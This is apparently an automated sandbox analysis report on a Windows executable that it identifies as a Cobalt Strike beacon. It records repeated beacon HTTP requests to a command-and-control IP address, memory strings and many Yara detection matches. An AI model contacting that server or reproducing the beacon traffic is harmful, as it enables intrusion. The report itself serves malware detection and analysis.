Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cm HTTP/1.1Accept: /Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache

Source: P3KxDOMmD3.exe, 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1909421925.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2620871241.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cm
Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cm.d
Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cm54.116:7810/cm
Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cm54.116:7810/cmay
Source: P3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmD
Source: P3KxDOMmD3.exe, 00000000.00000003.3498905059.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmN
Source: P3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmP
Source: P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1926499944.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmV
Source: P3KxDOMmD3.exe, 00000000.00000003.2603494375.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmVA
Source: P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmX
Source: P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmZ
Source: P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmc
Source: P3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmh
Source: P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmj
Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmk.3v
Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmk.py
Source: P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2638951717.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2492373736.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.4084894276.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmp
Source: P3KxDOMmD3.exe, 00000000.00000003.2876116472.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmq
Source: P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmr
Source: P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmu
Source: P3KxDOMmD3.exe, 00000000.00000003.3720845976.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmuj
Source: P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmx
Source: P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmxP
Source: P3KxDOMmD3.exe, 00000000.00000003.2620871241.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmxu
Source: P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1892519888.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.116:7810/cmy

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00692078 CreateProcessWithLogonW,

0_2_00692078

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001C5914	0_2_001C5914
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001C1928	0_2_001C1928
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001A916C	0_2_001A916C
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001C1264	0_2_001C1264
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001CAAB0	0_2_001CAAB0
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001B0334	0_2_001B0334
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001C0374	0_2_001C0374
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001C239C	0_2_001C239C
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001CC397	0_2_001CC397
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001BF5A8	0_2_001BF5A8
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001CE600	0_2_001CE600
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001ACE3C	0_2_001ACE3C
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001A9680	0_2_001A9680
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001CC680	0_2_001CC680
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001B6F38	0_2_001B6F38
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001CB7B0	0_2_001CB7B0
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001CCFF0	0_2_001CCFF0
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_006801A8	0_2_006801A8
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0066DA3C	0_2_0066DA3C
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0068F200	0_2_0068F200
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0066A280	0_2_0066A280
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0068D280	0_2_0068D280
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00677B38	0_2_00677B38
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0068DBF0	0_2_0068DBF0
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0068C3B0	0_2_0068C3B0
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00669D6C	0_2_00669D6C
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00682528	0_2_00682528
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00686514	0_2_00686514
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00681E64	0_2_00681E64
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0067867C	0_2_0067867C
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0068B6B0	0_2_0068B6B0
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00680F74	0_2_00680F74
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00670F34	0_2_00670F34
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00682F9C	0_2_00682F9C
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0068CF97	0_2_0068CF97

Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
